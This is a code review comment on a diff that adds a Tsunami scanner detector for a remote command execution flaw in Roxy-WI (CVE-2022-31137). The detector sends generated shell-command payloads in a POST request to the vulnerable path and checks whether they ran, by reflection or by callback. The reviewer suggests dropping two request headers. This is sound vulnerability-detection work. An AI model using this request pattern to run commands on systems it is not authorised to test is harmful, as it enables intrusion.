community/detectors/roxy_wi_cve_2022_31137/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202231137/Cve202231137Detector.java

```diff
@@ -0,0 +1,208 @@
+    } catch (IOException e) {
+      logger.atWarning().withCause(e).log("Request to target %s failed", networkService);
+    }
+    return false;
+  }
+
+  private boolean isServiceVulnerable(NetworkService networkService) {
+    return (payloadGenerator.isCallbackServerEnabled() && isVulnerableWithCallback(networkService))
+        || isVulnerableWithoutCallback(networkService);
+  }
+
+  private boolean isVulnerableWithoutCallback(NetworkService networkService) {
+    PayloadGeneratorConfig config =
+        PayloadGeneratorConfig.newBuilder()
+            .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.REFLECTIVE_RCE)
+            .setInterpretationEnvironment(
+                PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL)
+            .setExecutionEnvironment(
+                PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT)
+            .build();
+
+    Payload payload = payloadGenerator.generate(config);
+    String cmd = payload.getPayload();
+
+    HttpResponse response =
+        sendRequest(
+            networkService,
+            String.format(HTTP_PARAMETERS, URLEncoder.encode(cmd, StandardCharsets.UTF_8)));
+    if (response != null) {
+      if (response.bodyString().isEmpty()) {
+        return false;
+      }
+      return payload.checkIfExecuted(response.bodyString().get());
+    } else return false;
+  }
+
+  private boolean isVulnerableWithCallback(NetworkService networkService) {
+    PayloadGeneratorConfig config =
+        PayloadGeneratorConfig.newBuilder()
+            .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.BLIND_RCE)
+            .setInterpretationEnvironment(
+                PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL)
+            .setExecutionEnvironment(
+                PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT)
+            .build();
+
+    Payload payload = payloadGenerator.generate(config);
+    String cmd = payload.getPayload();
+
+    sendRequest(
+        networkService,
+        String.format(HTTP_PARAMETERS, URLEncoder.encode(cmd, StandardCharsets.UTF_8)));
+
+    return payload.checkIfExecuted();
+  }
+
+  private HttpResponse sendRequest(NetworkService networkService, String Payload) {
+    HttpHeaders httpHeaders =
+        HttpHeaders.builder()
+            .addHeader(CONTENT_TYPE, "application/x-www-form-urlencoded; charset=UTF-8")
+            .addHeader("X-Requested-With", "XMLHttpRequest")
+            .build();
+
+    String targetVulnerabilityUrl =
+        NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + VULNERABLE_REQUEST_PATH;
+    try {
+      return httpClient.send(
+          post(targetVulnerabilityUrl)
+              .setHeaders(httpHeaders)
+              .setRequestBody(ByteString.copyFromUtf8(Payload))
+              .build(),
+          networkService);

```

Comment:
While testing dynamically I noticed that these headers can be omitted, if you can confirm that they are not required, please remove this.
```suggestion

    String targetVulnerabilityUrl =
        NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + VULNERABLE_REQUEST_PATH;
    try {
      return httpClient.send(
          post(targetVulnerabilityUrl)
              .setRequestBody(ByteString.copyFromUtf8(Payload))
              .build(),
          networkService);

```